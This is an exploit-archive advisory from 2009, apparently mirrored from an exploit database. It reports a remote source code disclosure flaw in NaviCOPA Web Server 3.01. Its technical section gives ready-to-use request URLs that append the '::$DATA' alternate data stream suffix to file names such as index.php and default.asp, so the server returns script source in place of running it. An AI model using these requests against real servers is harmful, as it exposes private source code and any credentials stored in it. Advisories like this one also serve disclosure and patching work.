NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability
# Published : 2009-09-16
# Author : Dr_IDE
# Previous Title : Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
# Next Title : BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) 0day

#################################################################################
#
# NaviCOPA Web Server 3.01 Remote Source Code Disclosure
# Found By:		Dr_IDE
# Tested On:	Windows XPSP3
#
#################################################################################

- Description -

NaviCOPA Web Server 3.01 is a Windows based HTTP server. This is the latest version of
the application available. 

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]
	
	http://172.16.2.101/index.html::$DATA

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

# www.Syue.com [2009-09-16]